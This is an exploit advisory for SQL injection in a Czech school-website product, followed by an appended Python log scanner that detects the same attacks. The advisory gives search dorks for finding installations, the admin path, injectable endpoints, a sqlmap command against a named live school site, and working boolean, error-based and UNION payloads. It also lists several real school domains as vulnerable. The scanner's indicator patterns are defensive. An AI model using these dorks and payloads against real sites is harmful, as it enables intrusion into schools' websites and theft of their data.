############################################################
# Exploit Title : Vitalex Computers SRO Tvorba školních webů 1.0 SQL Injection
# Exploit Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : vitalex.cz
# Google Dork 1 : intext:"Vitalex Computers - Tvorba školních webů" site:cz
# Google Dork 2 : inurl:"/index.php?type=Blog&id=" site:cz
# Google Dork 3 : inurl:"/public/printAction.php?id="
# Exploit Risk : Medium
# Category : WebApps
# Version Information : 1.0 (bundled: TinyMCE 4.0, FancyBox 2.1.5, jQuery 1.12.2, jQuery UI 1.11.4, CodeMirror 5.20.2)
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018050236
############################################################

Czech Copyright © 2011 - 2018 | Vitalex Computers s.r.o. - Tvorba školních webů
SQL Injection Vulnerability

############################################################

# Admin Panel Login Path : /administrator/

Other Possible Dorks =>

inurl:"/public/printCalendar.php" site:cz
inurl:"/public/printFood.php" site:cz
inurl:"/public/script.php" site:cz
inurl:"/public/setTemplate.php" site:cz
inurl:"/public/statniSvatky.php" site:cz

############################################################

# SQL Injection Exploit =>

/public/printCalendar.php?id=[SQL Injection]
/public/printFood.php?id=[SQL Injection]
/public/script.php?id=[SQL Injection]
/public/setTemplate.php?id=[SQL Injection]
/public/statniSvatky.php?id=[SQL Injection]
/index.php?type=Blog&id=[SQL Injection]
/index.php?type=Contact&id=[SQL Injection]
/index.php?type=Post&id=[SQL Injection]

############################################################

[+] SQLMAP PoC :

$ sqlmap -u "https://www.mzszasada.cz/public/printAction.php?id=164" --dbs

[+] PoC SQL Injection :

Parameter: id (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=164 AND 1041=1041

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=164 AND (SELECT 5925 FROM (SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (ELT(5925=5925,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: id=164 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,0x52657268506d6d4d63484273527351744e435a5774704c7277517179536a46637249687765704a58,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zEWq

########################################################################################

# Example Vulnerable Sites =>

# zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/vTVbe
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

# skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/gHcSO
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

# spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/Phhwq
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

#######################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
#######################################################################################
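For operators of sites built on this product, a log-side check that follows from the endpoints and payload shapes above. This is an added example, not part of the advisory: it assumes Common Log Format access logs, the log lines are constructed, and the indicator regex only mirrors the boolean, error-based and UNION techniques the sqlmap output shows.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Endpoints the advisory lists as taking an injectable id parameter.
WATCHED_PATHS = {
    "/public/printAction.php", "/public/printCalendar.php", "/public/printFood.php",
    "/public/script.php", "/public/setTemplate.php", "/public/statniSvatky.php",
    "/index.php",
}
# Crude indicators of the sqlmap techniques shown in the PoC (boolean AND n=n,
# FLOOR(RAND()) error-based, UNION SELECT, stray quote, SQL comment).
INDICATORS = re.compile(
    r"(?i)(\bunion\b.*\bselect\b|\band\b\s*\d+=\d+|floor\(rand\(|information_schema|'|--)"
)
# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def classify_request(target):
    """Return a reason if the id parameter of a watched path looks hostile, else None."""
    parts = urlsplit(target)
    if parts.path not in WATCHED_PATHS:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("id", []):
        value = unquote_plus(raw)  # second decode catches %2527-style double encoding
        if value.isdigit():        # the application only ever expects a numeric id
            continue
        return "sqli-pattern" if INDICATORS.search(value) else "non-numeric-id"
    return None

def scan_access_log(lines):
    """Yield (ip, target, reason) for every request worth an analyst's attention."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_request(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("target"), reason))
    return hits

# Constructed sample lines; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Dec/2018:10:00:01 +0100] "GET /public/printAction.php?id=164 HTTP/1.1" 200 512',
    '203.0.113.5 - - [30/Dec/2018:10:00:02 +0100] "GET /public/printAction.php?id=164%20AND%201041=1041 HTTP/1.1" 200 512',
    '203.0.113.5 - - [30/Dec/2018:10:00:03 +0100] "GET /public/printAction.php?id=235%27 HTTP/1.1" 500 231',
    '203.0.113.9 - - [30/Dec/2018:10:00:04 +0100] "GET /index.php?type=Blog&id=7%20UNION%20ALL%20SELECT%20NULL,NULL-- HTTP/1.1" 200 4096',
    '203.0.113.9 - - [30/Dec/2018:10:00:05 +0100] "GET /index.php?type=Blog&id=abc HTTP/1.1" 404 120',
    '203.0.113.9 - - [30/Dec/2018:10:00:06 +0100] "GET /static/style.css HTTP/1.1" 200 880',
]
```

A 500 response paired with a flagged id, as in the third line, matches the MySQL syntax error shown in the proofs of concept above and is the strongest single signal here.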